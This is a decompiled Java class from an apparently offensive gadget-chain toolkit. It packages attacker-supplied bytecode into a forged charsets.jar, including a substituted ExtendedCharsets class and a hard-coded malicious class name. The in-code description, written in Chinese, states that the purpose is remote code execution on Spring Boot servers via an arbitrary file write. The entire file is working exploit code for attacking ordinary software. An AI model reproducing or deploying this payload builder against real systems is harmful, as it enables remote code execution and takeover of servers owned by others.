package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.JavassistHelper;
import java.io.ByteArrayOutputStream;
import java.util.jar.JarEntry;
import java.util.jar.JarOutputStream;
import sun.nio.cs.ext.MyExtendedCharsets;

@GadgetAnnotation(name = "charsets利用姿势1-jar包", description = "将字节码封装为charsets.jar文件\n适用于 SpringBoot 环境下写 charsets.jar RCE\n这里会固定写死恶意className为: sun.nio.cs.ext.IBM33722\nReference: \nhttps://landgrey.me/blog/22/\nhttps://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks\n", dependencies = {"springboot"}, authors = {Authors.LandGrey}, priority = 30)
@GadgetTags(tags = {Tag.CharsetJAR, Tag.Other}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/CharsetJarConvert.class */
public class CharsetJarConvert implements Gadget {
    public static byte[] cacheBytecode = null;

    public byte[] getObject(byte[] bArr, String str) throws Exception {
        return createCharsetJar(bArr, str);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.getEngine().setGadgetParam("className", "sun.nio.cs.ext.IBM33722");
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext), gadgetContext.getString(ContextTag.CLASS_NAME_KEY));
    }

    public static byte[] createCharsetJar(byte[] bArr, String str) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        JarOutputStream jarOutputStream = new JarOutputStream(byteArrayOutputStream);
        Throwable th = null;
        try {
            if (cacheBytecode == null) {
                JavassistHelper javassistHelper = new JavassistHelper(MyExtendedCharsets.class);
                javassistHelper.setVersion(50);
                javassistHelper.setClassName("sun.nio.cs.ext.ExtendedCharsets");
                cacheBytecode = javassistHelper.getBytecode();
            }
            jarOutputStream.putNextEntry(new JarEntry("sun.nio.cs.ext.ExtendedCharsets".replace(".", "/") + ".class"));
            jarOutputStream.write(cacheBytecode);
            jarOutputStream.closeEntry();
            jarOutputStream.putNextEntry(new JarEntry(str.replace(".", "/") + ".class"));
            jarOutputStream.write(bArr);
            jarOutputStream.closeEntry();
            if (jarOutputStream != null) {
                if (0 != 0) {
                    try {
                        jarOutputStream.close();
                    } catch (Throwable th2) {
                        th.addSuppressed(th2);
                    }
                } else {
                    jarOutputStream.close();
                }
            }
            return byteArrayOutputStream.toByteArray();
        } catch (Throwable th3) {
            if (jarOutputStream != null) {
                if (0 != 0) {
                    try {
                        jarOutputStream.close();
                    } catch (Throwable th4) {
                        th.addSuppressed(th4);
                    }
                } else {
                    jarOutputStream.close();
                }
            }
            throw th3;
        }
    }
}
